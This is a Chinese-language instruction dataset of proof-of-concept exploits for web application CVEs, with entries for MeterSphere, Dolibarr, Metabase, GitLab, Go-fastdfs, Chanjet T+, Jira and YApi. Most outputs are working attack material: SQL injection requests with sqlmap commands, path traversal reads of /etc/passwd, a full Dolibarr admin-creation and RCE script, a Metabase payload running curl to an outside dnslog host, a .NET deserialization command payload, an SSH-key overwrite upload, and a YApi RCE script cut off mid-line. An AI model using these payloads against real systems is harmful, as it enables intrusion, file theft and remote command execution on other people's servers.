  638. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:MeterSphere v1.15.4 认证用户SQL注入漏洞 CVE-2021-45788\n漏洞描述:MeterSphere是基于GPLv3协议的一站式的开源持续测试平台。在其1.15.4版本及以前,testcase相关API存在一处基于Order by的SQL注入漏洞。 参考链接: - [https://github.com/metersphere/metersphere/issues/8651](https://github.com/metersphere/metersphere/issues/8651)\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-45788\n【POC利用方法】\n1. docker compose up -d\n2. POST /test/case/list/1/10 HTTP/1.1\nHost: your-vps-ip:8081\nContent-Length: 3142\nAccept: application/json, text/plain, */*\nCSRF-TOKEN: [YOUR_CSRF_TOKEN]\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nContent-Type: application/json\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7\nCookie: MS_SESSION_ID=[YOUR_SESSION_ID]\nConnection: close\n\n{\"orders\":[{\"name\":\"name\",\"type\":\",if(1=1,sleep(5),0)\"}],\"components\":[{\"key\":\"name\",\"name\":\"MsTableSearchInput\",\"label\":\"commons.name\",\"operator\":{\"value\":\"like\",\"options\":[{\"label\":\"commons.adv_search.operators.like\",\"value\":\"like\"},{\"label\":\"commons.adv_search.operators.not_like\",\"value\":\"not like\"}]}},{\"key\":\"tags\",\"name\":\"MsTableSearchInput\",\"label\":\"commons.tag\",\"operator\":{\"value\":\"like\",\"options\":[{\"label\":\"commons.adv_search.operators.like\",\"value\":\"like\"},{\"label\":\"commons.adv_search.operators.not_like\",\"value\":\"not like\"}]}},{\"key\":\"module\",\"name\":\"MsTableSearchInput\",\"label\":\"test_track.case.module\",\"operator\":{\"value\":\"like\",\"options\":[{\"label\":\"commons.adv_search.operators.like\",\"value\":\"like\"},{\"label\":\"commons.adv_search.operators.not_like\",\"value\":\"not like\"}]}},{\"key\":\"priority\",\"name\":\"MsTableSearchSelect\",\"label\":\"test_track.case.priority\",\"operator\":{\"options\":[{\"label\":\"commons.adv_search.operators.in\",\"value\":\"in\"},{\"label\":\"commons.adv_search.operators.not_in\",\"value\":\"not in\"}]},\"options\":[{\"label\":\"P0\",\"value\":\"P0\"},{\"label\":\"P1\",\"value\":\"P1\"},{\"label\":\"P2\",\"value\":\"P2\"},{\"label\":\"P3\",\"value\":\"P3\"}],\"props\":{\"multiple\":true}},{\"key\":\"createTime\",\"name\":\"MsTableSearchDateTimePicker\",\"label\":\"commons.create_time\",\"operator\":{\"options\":[{\"label\":\"commons.adv_search.operators.between\",\"value\":\"between\"},{\"label\":\"commons.adv_search.operators.gt\",\"value\":\"gt\"},{\"label\":\"commons.adv_search.operators.ge\",\"value\":\"ge\"},{\"label\":\"commons.adv_search.operators.lt\",\"value\":\"lt\"},{\"label\":\"commons.adv_search.operators.le\",\"value\":\"le\"},{\"label\":\"commons.adv_search.operators.equals\",\"value\":\"eq\"}]}},{\"key\":\"updateTime\",\"name\":\"MsTableSearchDateTimePicker\",\"label\":\"commons.update_time\",\"operator\":{\"options\":[{\"label\":\"commons.adv_search.operators.between\",\"value\":\"between\"},{\"label\":\"commons.adv_search.operators.gt\",\"value\":\"gt\"},{\"label\":\"commons.adv_search.operators.ge\",\"value\":\"ge\"},{\"label\":\"commons.adv_search.operators.lt\",\"value\":\"lt\"},{\"label\":\"commons.adv_search.operators.le\",\"value\":\"le\"},{\"label\":\"commons.adv_search.operators.equals\",\"value\":\"eq\"}]}},{\"key\":\"creator\",\"name\":\"MsTableSearchSelect\",\"label\":\"api_test.creator\",\"operator\":{\"options\":[{\"label\":\"commons.adv_search.operators.in\",\"value\":\"in\"},{\"label\":\"commons.adv_search.operators.not_in\",\"value\":\"not in\"},{\"label\":\"commons.adv_search.operators.current_user\",\"value\":\"current user\"}]},\"options\":{\"url\":\"/user/list\",\"labelKey\":\"name\",\"valueKey\":\"id\"},\"props\":{\"multiple\":true}},{\"key\":\"reviewStatus\",\"name\":\"MsTableSearchSelect\",\"label\":\"test_track.review_view.execute_result\",\"operator\":{\"options\":[{\"label\":\"commons.adv_search.operators.in\",\"value\":\"in\"},{\"label\":\"commons.adv_search.operators.not_in\",\"value\":\"not in\"}]},\"options\":[{\"label\":\"test_track.review.prepare\",\"value\":\"Prepare\"},{\"label\":\"test_track.review.pass\",\"value\":\"Pass\"},{\"label\":\"test_track.review.un_pass\",\"value\":\"UnPass\"}],\"props\":{\"multiple\":true}}],\"filters\":{\"reviewStatus\":[\"Prepare\",\"Pass\",\"UnPass\"]},\"planId\":\"\",\"nodeIds\":[],\"selectAll\":false,\"unSelectIds\":[],\"selectThisWeedData\":false,\"selectThisWeedRelevanceData\":false,\"caseCoverage\":null}\n3. python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3\npython sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3 --current-user\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/MeterSphere v1.15.4 认证用户SQL注入漏洞 CVE-2021-45788.md"}
    639. 

  639. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:科达 MTS转码服务器 任意文件读取漏洞\n漏洞描述:KEDACOM MTS转码服务器存在任意文件读取漏洞,攻击这通过漏洞可以读取服务器任意信息\n影响版本:``` MTS转码服务器 ```\n网络测绘:``` app=\"MTS转码服务器\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"MTS转码服务器\"\n2. /../../../../../../../../etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/科达 MTS转码服务器 任意文件读取漏洞.md"}
    640. 

  640. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Dolibarr edit.php 远程命令执行漏洞 CVE-2022-40871\n漏洞描述:Dolibarr edit.php 存在远程命令执行漏洞,攻击者通过逻辑漏洞创建管理员后可以通过后台漏洞获取服务器权限\n影响版本:``` Dolibarr <= 15.0.3 ```\n网络测绘:``` \"Dolibarr\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-40871\n【POC利用方法】\n1. Dolibarr <= 15.0.3\n2. import requests\nfrom requests.packages import urllib3\nimport time\nimport random\nimport sys\nimport re\n\n\nsess = requests.Session()\npcre = re.compile(r'name=\\\"token\\\"\\s+value=\\\"([^>]+)\\\"\\s*[/]*>')\ndef request(method, url, headers=None, data=None, proxies=None, timeout=30):\n    i = 1\n    urllib3.disable_warnings()\n    resp = None\n    proxies = proxies\n    while i <= 3:\n        try:\n            resp = sess.request(method=method, url=url, headers=headers,\n                                    data=data, proxies=proxies, timeout=timeout, verify=False)\n            break\n        except requests.exceptions.TooManyRedirects:\n            break\n        except requests.exceptions.ConnectionError as e:\n            time.sleep(2 + random.randint(1, 4))\n        except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout, requests.exceptions.Timeout):\n            time.sleep(2 + random.randint(1, 4))\n        finally:\n            i += 1\n    if i > 3:\n        print('[-]Error retrieve with max retries: {}'.format(url))\n    return resp\n\ndef exp():\n    if len(sys.argv) < 2:\n        sys.exit('Usage: python3 {} http://xxxxx.com/'.format(sys.argv[0]))\n    if sys.argv[1][-1] == '/':\n        base = sys.argv[1].rsplit('/', 1)[0]\n    else:\n        base = sys.argv[1]\n    headers = {\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36',\n    }\n    #proxies = {'http': 'http://127.0.0.1:8082', 'https': 'http://127.0.0.1:8082'}\n    proxies = None\n    res = request('GET', base, headers=headers, proxies=proxies)\n    err_flag = 1\n    if res:\n        print('[*] Attempt to add admin.')\n        base = res.url.rsplit('/', 1)[0]\n        add_admin_url = '{}/install/step5.php'.format(base)\n        data = {\n            'action': 'set',\n            'login': 'testadmins',\n            'pass': 'testadmins',\n            'pass_verif': 'testadmins',\n            'selectlang': 'auto'\n        }\n        headers['Content-Type'] = 'application/x-www-form-urlencoded'\n        res = request('POST', add_admin_url, headers=headers, data=data, proxies=proxies)\n        if res and 'created successfully' in res.text or ('exists' in res.text and 'Email  already exists' not in res.text):\n            csrf_token_url = '{}/index.php'.format(base)\n            res = request('GET', csrf_token_url, headers=headers, proxies=proxies)\n            if res:\n                print('[*] Attempt to login.')\n                try:\n                    csrf_token = pcre.findall(res.text)[0]\n                except:\n                    csrf_token = ''\n                login_url = '{}/index.php?mainmenu=home'.format(base)\n                headers['Referer'] = csrf_token_url\n                data = {\n                    'token':'{}'.format(csrf_token),\n                    'actionlogin': 'login',\n                    'loginfunction': 'loginfunction',\n                    'username': 'testadmins',\n                    'password': 'testadmins'\n                }\n                res = request('POST', login_url, headers=headers, data=data, proxies=proxies)\n                if res and res.status_code == 200 and 'logout.php' in res.text:\n                    print('[*] Attempt to get csrf token.')\n                    csrf_token_url = '{}/admin/menus/edit.php?menuId=0&action=create&menu_handler=eldy_menu'.format(base)\n                    res = request('GET', csrf_token_url, headers=headers, proxies=proxies)\n                    if res:\n                        print('[*] Attemp to inset evil data.')\n                        try:\n                            csrf_token = pcre.findall(res.text)[0]\n                        except:\n                            csrf_token = ''\n                        inset_evil_url = '{}/admin/menus/edit.php'.format(base)\n                        data = {\n                            'token': '{}'.format(csrf_token),\n                            'action': 'add',\n                            'menuId': random.randint(10000, 99999),\n                            'menu_handler': 'eldy_menu',\n                            'user': 2,\n                            'type': 1,\n                            'titre': 1,\n                            'url': 1,\n                            'enabled': \"1==1));$d=base64_decode('ZWNobyAnPCEtLScmJmVjaG8gcHduZWQhISEmJmlkJiZlY2hvJy0tPic=');$a=base64_decode('c3lzdGVt');$a($d);//\" #execute id command,bypass core/lib/function.lib.php limits\n                        }\n                        res = request('POST', inset_evil_url, headers=headers, data=data, proxies=proxies)\n                        if res and res.history[0].status_code == 302:\n                            print('[*] Attemp to execute command.')\n                            request('GET', '{}/admin/menus/index.php'.format(base), headers=headers, proxies=proxies)\n                            time.sleep(3)\n                            evil_url = '{}/admin/index.php'.format(base)\n                            res = request('GET', evil_url, headers=headers, proxies=proxies)\n                            if res and res.status_code == 200 and 'pwned!!!' in res.text:\n                                print(res.text[:100])\n                                print('[+] vulnrable! {}'.format(base))\n                                err_flag = 0\n                    \n    if err_flag:\n        print('[-] {} is not exploitable.'.format(sys.argv[1]))\n\nexp()\n3. res = request('POST', login_url, headers=headers, data=data, proxies=proxies)\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Dolibarr edit.php 远程命令执行漏洞 CVE-2022-40871.md"}
    641. 

  641. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Casbin casdoor static 任意文件读取漏洞\n漏洞描述:Casdoor 是 Casbin 开源社区推出的基于 OAuth 2.0 / OIDC 的中心化的单点登录(SSO)身份验证平台。 Casdoor static 存在任意文件读取漏洞,攻击者通过发送特殊的请求包可以获取服务器中的敏感文件。\n影响版本:``` Casdoor ```\n网络测绘:``` title=\"Casdoor\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"Casdoor\"\n2. /static/../../../../../../../../../../../etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Casdoor static 任意文件读取漏洞.md"}
    642. 

  642. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GitLab 远程命令执行漏洞 CVE-2021-22205\n漏洞描述:GitLab是一款Ruby开发的Git项目管理平台。在11.9以后的GitLab中,因为使用了图片处理工具ExifTool而受到漏洞[CVE-2021-22204](https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html)的影响,攻击者可以通过一个未授权的接口上传一张恶意构造的图片,进而在GitLab服务器上执行任意命令。 参考链接: - https://hackerone.com/reports/1154542 - https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/ - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-22205.yaml\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-22205\n【POC利用方法】\n1. docker-compose up -d\n2. python poc.py http://your-ip:8080 \"touch /tmp/success\"\n3. python3 CVE-2021-22205.py -v true -t http://your-target-ip:port/\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/GitLab 远程命令执行漏洞 CVE-2021-22205.md"}
    643. 

  643. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Metabase validate 远程命令执行漏洞 CVE-2023-38646\n漏洞描述:Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松地连接到各种数据源,包括数据库、云服务和API,然后使用直观的界面进行数据查询、分析和可视化。未经身份认证的远程攻击者利用该漏洞可以在服务器上以运行 Metabase 服务器的权限执行任意命令\n影响版本:Metabase\n网络测绘:``` app=\"Metabase\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-38646\n【POC利用方法】\n1. app=\"Metabase\"\n2. /api/session/properties\n3. POST /api/setup/validate HTTP/1.1\nHost: \nContent-Type: application/json\nContent-Length: 812\n\n{\n    \"token\": \"e56e2c0f-71bf-4e15-9879-d964f319be69\",\n    \"details\":\n    {\n        \"is_on_demand\": false,\n        \"is_full_sync\": false,\n        \"is_sample\": false,\n        \"cache_ttl\": null,\n        \"refingerprint\": false,\n        \"auto_run_queries\": true,\n        \"schedules\":\n        {},\n        \"details\":\n        {\n            \"db\": \"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\\njava.lang.Runtime.getRuntime().exec('curl ecw14d.dnslog.cn')\\n$$--=x\",\n            \"advanced-options\": false,\n            \"ssl\": true\n        },\n        \"name\": \"an-sec-research-team\",\n        \"engine\": \"h2\"\n    }\n}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Metabase validate 远程命令执行漏洞 CVE-2023-38646.md"}
    644. 

  644. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413\n漏洞描述:GitLab中存在Graphql接口 输入构造的数据时会泄露用户邮箱和用户名\n影响版本:``` GitLab 13.4 - 13.6.2 ```\n网络测绘:``` title=\"GitLab\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-26413\n【POC利用方法】\n1. GitLab 13.4 - 13.6.2\n2. title=\"GitLab\"\n3. POST /api/graphql HTTP/1.1\nHost: xxx.xxx.xxx.xxx\nContent-Length: 212\nContent-Type: application/json\n\n\n{\"query\":\"{\\nusers {\\nedges {\\n  node {\\n    username\\n    email\\n    avatarUrl\\n    status {\\n      emoji\\n      message\\n      messageHtml\\n     }\\n    }\\n   }\\n  }\\n }\",\"variables\":null,\"operationName\":null}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413.md"}
    645. 

  645. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800\n漏洞描述:Go-fastdfs upload 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,攻击服务器\n影响版本:``` Go-fastdfs ```\n网络测绘:``` \"go-fastdfs\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-1800\n【POC利用方法】\n1. \"go-fastdfs\"\n2. POST /group1/upload HTTP/1.1\nHost: \nContent-Length: 951\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryigj9M9EJykZc9u53\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\n------WebKitFormBoundaryigj9M9EJykZc9u53\nContent-Disposition: form-data; name=\"file\"; filename=\"id\"\nContent-Type: application/octet-stream\n\ntest\n------WebKitFormBoundaryigj9M9EJykZc9u53\nContent-Disposition: form-data; name=\"scene\"\n\ndefault\n------WebKitFormBoundaryigj9M9EJykZc9u53\nContent-Disposition: form-data; name=\"filename\"\n\nid_rsa\n------WebKitFormBoundaryigj9M9EJykZc9u53\nContent-Disposition: form-data; name=\"output\"\n\njson2\n------WebKitFormBoundaryigj9M9EJykZc9u53\nContent-Disposition: form-data; name=\"path\"\n\n../../../../../root/.ssh\n------WebKitFormBoundaryigj9M9EJykZc9u53\nContent-Disposition: form-data; name=\"code\"\n\n\n------WebKitFormBoundaryigj9M9EJykZc9u53\nContent-Disposition: form-data; name=\"auth_token\"\n\n\n------WebKitFormBoundaryigj9M9EJykZc9u53\nContent-Disposition: form-data; name=\"submit\"\n\nupload\n------WebKitFormBoundaryigj9M9EJykZc9u53--\n3. Content-Length: 951\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800.md"}
    646. 

  646. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞\n漏洞描述:用友 畅捷通T+ GetStoreWarehouseByStore 存在 .net反序列化漏洞,导致远程命令执行,控制服务器\n影响版本:用友 畅捷通T+\n网络测绘:``` app=\"畅捷通-TPlus\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"畅捷通-TPlus\"\n2. POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F\nConnection: close\nContent-Length: 668\nX-Ajaxpro-Method: GetStoreWarehouseByStore\nAccept-Encoding: gzip\n\n{\n  \"storeID\":{\n    \"__type\":\"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\",\n    \"MethodName\":\"Start\",\n    \"ObjectInstance\":{\n      \"__type\":\"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\",\n      \"StartInfo\":{\n        \"__type\":\"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\",\n        \"FileName\":\"cmd\",\n        \"Arguments\":\"/c whoami > C:/Progra~2/Chanjet/TPlusStd/WebSite/2RUsL6jgx9sGX4GItQBcVfxarBM.txt\"\n      }\n    }\n  }\n}\n3. /tplus/xxx.txt\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞.md"}
    647. 

  647. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Jira makeRequest SSRF漏洞 CVE-2019-8451\n漏洞描述:Jira的 /plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析,此漏洞无需任何凭据即可触发。\n影响版本:``` Atlassian Jira <8.4.0 ```\n网络测绘:``` app=\"ATLASSIAN-JIRA\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2019-8451\n【POC利用方法】\n1. Atlassian Jira <8.4.0\n2. app=\"ATLASSIAN-JIRA\"\n3. /plugins/servlet/gadgets/makeRequest?url=http://目标IP@www.baidu.com/robots.txt\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Jira makeRequest SSRF漏洞 CVE-2019-8451.md"}
    648. 

  648. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417\n漏洞描述:Franklin Electric Franklin Fueling Systems是美国Franklin Electric公司的一个加油系统。 Franklin Fueling Systems tsaupload.cgi 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器敏感文件。\n影响版本:``` Franklin Fueling Systems ```\n网络测绘:``` \"Franklin Fueling Systems\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-46417\n【POC利用方法】\n1. Franklin Fueling Systems\n2. \"Franklin Fueling Systems\"\n3. /cgi-bin/tsaupload.cgi?file_name=../../../../../../etc/passwd&password=\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417.md"}
    649. 

  649. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:YApi NoSQL注入导致远程命令执行漏洞\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. python poc.py --debug one4all -u http://your-ip:3000/\n3. import requests\nimport json\nimport click\nimport re\nimport sys\nimport logging\nimport hashlib\nimport binascii\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.primitives import padding\nfrom urllib.parse import urljoin\n\nlogger = logging.getLogger('attacker')\nlogger.setLevel('WARNING')\nch = logging.StreamHandler(sys.stdout)\nch.setFormatter(logging.Formatter('%(asctime)s - %(message)s'))\nlogger.addHandler(ch)\nchoices = 'abcedf0123456789'\nscript_template = r'''const sandbox = this\nconst ObjectConstructor = this.constructor\nconst FunctionConstructor = ObjectConstructor.constructor\nconst myfun = FunctionConstructor('return process')\nconst process = myfun()\nconst Buffer = FunctionConstructor('return Buffer')()\nconst output = process.mainModule.require(\"child_process\").execSync(Buffer.from('%s', 'hex').toString()).toString()\ncontext.responseData = 'testtest' + output + 'testtest'\n'''\n\n\ndef compute(passphase: str):\n    nkey = 24\n    niv = 16\n    key = ''\n    iv = ''\n    p = ''\n\n    while True:\n        h = hashlib.md5()\n        h.update(binascii.unhexlify(p))\n        h.update(passphase.encode())\n        p = h.hexdigest()\n\n        i = 0\n        n = min(len(p) - i, 2 * nkey)\n        nkey -= n // 2\n        key += p[i:i + n]\n        i += n\n        n = min(len(p) - i, 2 * niv)\n        niv -= n // 2\n        iv += p[i:i + n]\n        i += n\n\n        if nkey + niv == 0:\n            return binascii.unhexlify(key), binascii.unhexlify(iv)\n\n\ndef aes_encode(data):\n    key, iv = compute('abcde')\n    padder = padding.PKCS7(128).padder()\n    cipher = Cipher(algorithms.AES(key), modes.CBC(iv))\n    encryptor = cipher.encryptor()\n    ct = encryptor.update(padder.update(data.encode()) + padder.finalize()) + encryptor.finalize()\n    return binascii.hexlify(ct).decode()\n\n\ndef aes_decode(data):\n    key, iv = compute('abcde')\n    unpadder = padding.PKCS7(128).unpadder()\n    cipher = Cipher(algorithms.AES(key), modes.CBC(iv))\n    decryptor = cipher.decryptor()\n    ct = decryptor.update(binascii.unhexlify(data)) + decryptor.finalize()\n    ct = unpadder.update(ct) + unpadder.finalize()\n    return ct.decode().strip()\n\n\ndef brute_token(target, already):\n    url = urljoin(target, '/api/interface/up')\n    current = '^'\n    for i in range(20):\n        for ch in choices:\n            guess = current + ch\n            data = {\n                'id': -1,\n                'token': {\n                    '$regex': guess,\n                    '$nin': already\n                }\n            }\n            headers = {\n                'Content-Type': 'application/json'\n            }\n            response = requests.post(url,\n                                     data=json.dumps(data),\n                                     headers=headers,\n                                     # proxies={'https': 'http://127.0.0.1:8085', 'http': 'http://127.0.0.1:8085'},\n                                     # verify=False,\n                                     )\n            res = response.json()\n\n            if res['errcode'] == 400:\n                current = guess\n                break\n\n        logger.debug(f'current cuess: {current}')\n\n    return current[1:]\n\n\ndef find_owner_uid(target, token):\n    url = urljoin(target, '/api/project/get')\n    for i in range(1, 200):\n        params = {'token': aes_encode(f'{i}|{token}')}\n        response = requests.get(url, params=params,\n                            # proxies={'https': 'http://127.0.0.1:8085', 'http': 'http://127.0.0.1:8085'},\n                            # verify=False,\n                            )\n        data = response.json()\n        if data['errcode'] == 0:\n            return i\n\n    return None\n\n\ndef find_project(target, token, pid=None):\n    url = urljoin(target, '/api/project/get')\n    params = {'token': token}\n    if pid:\n        params['id'] = pid\n\n    response = requests.get(url,\n                            params=params,\n                            #proxies={'https': 'http://127.0.0.1:8085', 'http': 'http://127.0.0.1:8085'},\n                            #verify=False,\n                            )\n    data = response.json()\n\n    if data['errcode'] == 0:\n        return data['data']\n\n\ndef find_col(target, token, brute_from, brute_to):\n    url = urljoin(target, '/api/open/run_auto_test')\n\n    for i in range(brute_from, brute_to):\n        try:\n            params = {'token': token, 'id': i, \"mode\": \"json\"}\n            response = requests.get(url,\n                                    params=params,\n                                    timeout=5,\n                                    #proxies={'https': 'http://127.0.0.1:8085', 'http': 'http://127.0.0.1:8085'},\n                                    #verify=False,\n                                    )\n\n            data = response.json()\n            if 'message' not in data:\n                continue\n\n            if data['message']['len'] > 0:\n                logger.debug('Test Result Found: %r', response.url)\n                yield i\n        except requests.exceptions.Timeout:\n            logger.debug('id=%d timeout', i)\n            pass\n\n\ndef update_project(target, token, project_id, command):\n    url = urljoin(target, '/api/project/up')\n\n    command_hex = command.encode().hex()\n    script = script_template % command_hex\n    response = requests.post(url,\n                             params={'token': token},\n                             json={'id': project_id, 'after_script': script},\n                             # proxies={'https': 'http://127.0.0.1:8085', 'http': 'http://127.0.0.1:8085'},\n                             # verify=False,\n                             )\n    data = response.json()\n    return data['errcode'] == 0\n\n\ndef run_auto_test(target, token, col_id):\n    url = urljoin(target, '/api/open/run_auto_test')\n\n    response = requests.get(url, \n                            params={'token': token, 'id': col_id, 'mode': 'json'},\n                            # proxies={'https': 'http://127.0.0.1:8085', 'http': 'http://127.0.0.1:8085'},\n                            # verify=False,\n                            )\n\n    try:\n        data = response.json()\n        return data['list'][0]['res_body'][8:-8]\n    except (requests.exceptions.JSONDecodeError, KeyError, IndexError, TypeError) as e:\n        g = re.search(br'testtest(.*?)testtest', response.content, re.I | re.S)\n        if g:\n            return g.group(1).decode()\n        else:\n            return None\n\n\ndef clear_project(target, token, project_id, old_after_script):\n    url = urljoin(target, '/api/project/up')\n    response = requests.post(url, params={'token': token}, json={'id': project_id, 'after_script': old_after_script})\n    data = response.json()\n    return data['errcode'] == 0\n\n\n@click.group()\n@click.option('--debug', 'debug', is_flag=True, type=bool, required=False, default=False)\ndef cli(debug):\n    if debug:\n        logger.setLevel('DEBUG')\n\n\n@cli.command('enc')\n@click.argument('data', type=str, required=True)\ndef cmd_enc(data: str):\n    click.echo(aes_encode(data))\n\n\n@cli.command('dec')\n@click.argument('data', type=str, required=True)\ndef cmd_dec(data: str):\n    click.echo(aes_decode(data))\n\n\n@cli.command('token')\n@click.option('-u', '--url', type=str, required=True)\n@click.option('-c', '--count', type=int, default=5)\ndef cmd_token(url, count):\n    already = []\n    for i in range(count):\n        token = brute_token(url, already)\n        if not token:\n            break\n\n        click.echo(f'find a valid token: {token}')\n        already.append(token)\n\n\n@cli.command('owner')\n@click.option('-u', '--url', type=str, required=True)\n@click.option('-t', '--token', 'token', type=str, required=True, help='Token that get from first step')\ndef cmd_owner(url, token):\n    aid = find_owner_uid(url, token)\n    e = aes_encode(f'{aid}|{token}')\n    click.echo(f'your owner id is: {aid}, encrypted token is {e}')\n\n\n@cli.command('project')\n@click.option('-u', '--url', type=str, required=True)\n@click.option('-o', '--owner-id', 'owner', type=str, required=True)\n@click.option('-t', '--token', 'token', type=str, required=True, help='Token that get from first step')\ndef cmd_project(url, owner, token):\n    token = aes_encode(f'{owner}|{token}')\n    project = find_project(url, token)\n    if project:\n        logger.info('[+] project by this token: %r', project)\n        click.echo(f'your project id is: {project[\"_id\"]}')\n\n\n@cli.command('col')\n@click.option('-u', '--url', type=str, required=True)\n@click.option('-o', '--owner-id', 'owner', type=str, required=True)\n@click.option('-t', '--token', 'token', type=str, required=True, help='Token that get from first step')\n@click.option('--from', 'brute_from', type=int, required=False, default=1, help='Brute Col id from this number')\n@click.option('--to', 'brute_to', type=int, required=False, default=200, help='Brute Col id to this number')\ndef cmd_col(url, owner, token, brute_from, brute_to):\n    token = aes_encode(f'{owner}|{token}')\n    for i in find_col(url, token, brute_from, brute_to):\n        click.echo(f'found a valid col id: {i}')\n\n\n@cli.command('rce')\n@click.option('-u', '--url', type=str, required=True)\n@click.option('-o', '--owner-id', 'owner', type=str, required=True)\n@click.option('-t', '--token', 'token', type=str, required=True, help='Token that get from first step')\n@click.option('--pid', 'project_id', type=int, required=True)\n@click.option('--cid', 